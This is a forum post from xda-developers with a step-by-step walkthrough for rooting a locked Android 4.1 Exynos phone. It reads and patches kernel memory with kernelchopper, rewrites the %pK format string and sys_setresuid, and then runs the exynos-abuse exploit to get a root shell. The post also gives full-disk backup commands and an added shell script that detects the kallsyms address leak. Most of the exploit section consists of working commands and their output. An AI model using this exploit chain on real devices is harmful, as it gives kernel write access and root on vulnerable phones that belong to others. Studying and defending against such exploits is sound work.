Channel: xda-developers - Android Software and Hacking General [Developers Only]

[ROOT]Open source method to root locked Android 4.1

Here is an open-source method to root your phone (with adb enabled), based on:

- 300 lines of C code I attached to http://forum.xda-developers.com/show...7&postcount=14

- an ARM compiler to build this code, if you do not want to trust my resulting binaries attached to http://forum.xda-developers.com/show...7&postcount=14

- any apk with a terminal you trust (I use Terminal IDE; Terminal Emulator will do).

- any busybox you trust (I use the one from Terminal IDE).

- a computer with the Android development package; I used adt-bundle-linux-x86-20130729


STEP 0: You may apply this to any Android system at your own risk. If the output of any instruction is not exactly as shown here, you should adapt the following instructions accordingly (following the color codes, and counting the underlined words in hexadecimal notation), or better, quit. If you do not get exactly all the outputs I colored in red here, you should QUIT or change the previous instructions.

If you have no internal microSD, I suggest you first chdir to a directory on your computer which can host one file of size >4Gb (3898777809 bytes for my Padfone 2, the day I bought it).

STEP 1: finding the s_show->seq_printf format string (in the example given, found at 0x80c281c6).
Open Terminal IDE and select "install system". You do not need to "install gcc". Then select the first menu item, named "terminal IDE", and type at its prompt:
Code:

chmod 1777 /data/data/com.spartacusrex.spartacuside/files ; cp system/bin/busybox grep ; chmod 755 grep
We now use adb to put all the attached files (unzipped) in /data/data/com.spartacusrex.spartacuside/files. The /usr/bin/script command is specific to Linux; if you do not have it, making bug reports will be more difficult, and you will need a microSD card or a USB disk plugged into your Android device.
Code:

script backup_before_installing_su_to_disk
adt-bundle-linux-x86-20130729/sdk/platform-tools/adb push /tmp/kernelchopper /data/data/com.spartacusrex.spartacuside/files
adt-bundle-linux-x86-20130729/sdk/platform-tools/adb push /tmp/exynos-abuse-static /data/data/com.spartacusrex.spartacuside/files
adt-bundle-linux-x86-20130729/sdk/platform-tools/adb shell
cd /data/data/com.spartacusrex.spartacuside/files
./grep -l . /dev/graphics/fb0
/dev/graphics/fb0
./grep Kernel /proc/iomem
  80208000-80d9e39f : Kernel code
  80f04000-8128184b : Kernel data
./kernelchopper d 80208000 c00000 | ./grep -C 1 '25 70 4b 20 25 63 20 25 73 0a 00\|: 70 4b 20 25 63 20 25 73 0a 00\|: 4b 20 25 63 20 25 73 0a 00\|: 20 25 63 20 25 73 0a 00\|: 25 63 20 25 73 0a 00\|: 63 20 25 73 0a 00\|25 70 4b 20 25 63 20 25 73 0a $\|25 70 4b 20 25 63 20 25 73 $\|25 70 4b 20 25 63 20 25 $\|25 70 4b 20 25 63 20 25 $\|25 70 4b 20 25 63 20 $\|25 70 4b 20 25 63 $' | ./grep -C 1 '25 70 4b 20 25 63 20 25 73 0a 00\|: 20 25 73 0a 00\|: 25 73 0a 00\|: 73 0a 00\|: 0a 00\|: 00\|25 70 4b 20 25 $\|25 70 4b 20 $\|25 70 4b $\|25 70 4b $\|25 70 $\|25 $'
80c281c0: 5b 25 73 5d 0a 00 25 70 4b 20 25 63 20 25 73 0a
80c281d0: 00 6b 61 6c 6c 73 79 6d 73 00 2b 25 23 6c 78 2f
./kernelchopper d 80c281c0 20
80c281c0: 5b 25 73 5d 0a 00 25 70 4b 20 25 63 20 25 73 0a
80c281d0: 00 6b 61 6c 6c 73 79 6d 73 00 2b 25 23 6c 78 2f
./kernelchopper d 80c281c6 b
80c281c6: 25 70 4b 20 25 63 20 25 73 0a 00
./kernelchopper m 80c281c6
204b7025
./grep sys_setresuid /proc/kallsyms
00000000 T sys_setresuid
00000000 T sys_setresuid16
./kernelchopper m 80c281c6 20207025
./kernelchopper m 80c281c6
20207025
./grep sys_setresuid /proc/kallsyms
c00856f0  T sys_setresuid
c00b7318  T sys_setresuid16

Notice that /proc/kallsyms now gives offsets instead of 00000000.

STEP 2: patching sys_setresuid, applying exynos-abuse.c manually (found at 0x802856f0, which is 0x00856f0 plus 80208000). You should replace the underlined lone 8 by the number of underlined bytes before the 00 00 50 e3 ...
Code:

./kernelchopper d 802856f0 80 | ./grep '00 00 50 e3\|20 00 00 ea'
80285720: 04 72 93 e5 a7 da ff eb 00 00 50 e3 20 00 00 ea
./kernelchopper d 80285728 8
80285728: 00 00 50 e3 20 00 00 ea
./kernelchopper m 80285728
e3500000
./kernelchopper m 80285728 e3500001

STEP 3: getting a root shell.
Code:

./exynos-abuse-static
2000@android:/data/data/com.spartacusrex.spartacuside/files # /system/bin/id
uid=0(root) gid=2000(shell) groups=1003(graphics),1004(input),1007(log),1009(mount),1011(adb),1015(sdcard_rw),1028(sdcard_r),3001(net_bt_admin),3002(net_bt),3003(inet),3006(net_bw_stats)
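The post checks that its %pK patch worked by watching /proc/kallsyms switch from 00000000 to real addresses. The same observation can be turned around into a tamper check for a device you administer; this is an added example, not part of the original post, and the sample kallsyms lines are constructed from the outputs quoted above:

```shell
#!/bin/sh
# Added check, not from the original post. Given the text of /proc/kallsyms,
# the kptr_restrict value and the calling uid, report LEAK when a restricted,
# non-root caller can still read non-zero kernel addresses (the state the post
# reaches after rewriting the "%pK %c %s\n" format string in kernel memory).
# Usage: kallsyms_leak_check KPTR_RESTRICT UID < /proc/kallsyms
kallsyms_leak_check() {
    restrict="$1"
    uid="$2"
    awk -v restrict="$restrict" -v uid="$uid" '
        # field 1 is the address, field 2 the symbol type, field 3 the name
        $1 ~ /^0+$/        { masked++; next }
        $1 ~ /^[0-9a-f]+$/ { shown++ }
        END {
            if (NR == 0)                                { print "EMPTY"; exit 2 }
            if (restrict >= 1 && uid != 0 && shown > 0) { print "LEAK"; exit 1 }
            if (restrict >= 1 && shown == 0)            { print "MASKED"; exit 0 }
            print "OK"   # kptr_restrict=0: exposure is policy, not tampering
        }'
}

# Constructed samples, built from the kallsyms output quoted in this post
SAMPLE_MASKED='00000000 T sys_setresuid
00000000 T sys_setresuid16'
SAMPLE_LEAK='c00856f0  T sys_setresuid
c00b7318  T sys_setresuid16'

# Live variant for a device shell: kptr_restrict is readable under /proc/sys
live_check() {
    restrict=$(cat /proc/sys/kernel/kptr_restrict 2>/dev/null || echo 0)
    kallsyms_leak_check "$restrict" "$(id -u)" < /proc/kallsyms
}

# Demo on the constructed samples: expect MASKED, then LEAK
printf '%s\n' "$SAMPLE_MASKED" | kallsyms_leak_check 1 2000
printf '%s\n' "$SAMPLE_LEAK"   | kallsyms_leak_check 1 2000 || true
```

On a stock device with kptr_restrict=1, an unprivileged shell (uid 2000 as in the output above) must get MASKED; LEAK means the %pK restriction has been defeated.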

And you are root until the adb connection ends. I strongly suggest you make a first true backup, to have a chance of restoring the phone to its current state. With an internal microSD, you can type:

Code:

cp grep bzip2
./bzip2 -c < /dev/block/mmcblk0 > /Removable/Storage1/backup.bz2

To make use of this backup file, you will need kpartx.

If you have NO internal microSD, try a network drive; or, if you can wait a full day (like me), you can do:

Code:

cp grep bzip2
cp grep uuencode
./bzip2 -c < /dev/block/mmcblk0 | ./uuencode -

The result will be shown in the current window, so you had better hide it once it works. I got a throughput of 400kb/s with a hidden xterm.

You will then be able to recover its content with
Code:

LANG= grep -aA99999999 '^begin 666 -' < backup_before_installing_su_to_diskreal | uudecode -o backup.bz2
You may now install /system/xbin/su, possibly renamed to avoid exposing su to malware.
Here is my firmware.
Code:

Android version: 4.1.1, 3.4.0-perf-g64..., M3.13.30-A68_101034 [Jan 22 2013]
If you need help, please type up-arrow repeatedly, down-arrow repeatedly, then provide the file backup_before_installing_su_to_diskreal.

Credits to alephzain for the original version of exynos-abuse.c, SW686 for kernelchopper.c, and spartacusrex for Terminal IDE on Google Play.

This was tested independently here, and the first version of this post was made in the same thread.

Please suggest tags, this is the first thread I open.
